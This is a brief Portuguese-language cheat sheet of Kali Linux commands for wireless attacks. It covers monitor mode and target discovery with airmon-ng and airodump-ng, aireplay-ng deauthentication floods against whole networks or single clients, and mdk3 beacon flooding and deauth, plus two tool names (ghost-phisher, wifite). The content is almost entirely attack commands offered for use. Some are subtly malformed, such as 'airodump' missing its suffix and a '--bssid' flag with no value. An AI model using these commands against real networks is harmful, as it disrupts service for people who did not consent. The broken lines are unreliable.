         __                                                                    __
  ____ _/ /_____ _____ ___  _____  _____                ____ ____  _________ _/ /
 / __ `/ __/ __ `/ __ `/ / / / _ \/ ___/    ______     / __ `/ _ \/ ___/ __ `/ / 
/ /_/ / /_/ /_/ / /_/ / /_/ /  __(__  )    /_____/    / /_/ /  __/ /  / /_/ / /  
\__,_/\__/\__,_/\__, /\__,_/\___/____/                \__, /\___/_/   \__,_/_/   
                  /_/                                /____/                      


1. usando aireplay e airodump

[+] root@kali:~# airmon-ng start wlan0
[+] root@kali:~# airodump-ng wlan0mon
[+] root@kali:~# airodump --bssid (bssid) --channel (channel) wlan0mon
[+] root@kali:~# aireplay-ng --deauth 100000 --bssid wlan0mon ==> rede inteira
[+] root@kali:~# aireplay-ng --deauth 100000 -a 1c:a5:32:1c:5b:F4 -e (essid) wlan0mon ==> cliente especifico

2. usando mdk3

[+] root@kali:~# mdk3 wlan0mon b -m -k -c 1 -s 1000 ==> flood de bssid
[+] root@kali:~# mdk3 wlan0mon d -c (canal) ==> deauth



3. ghost-phisher
4. wifite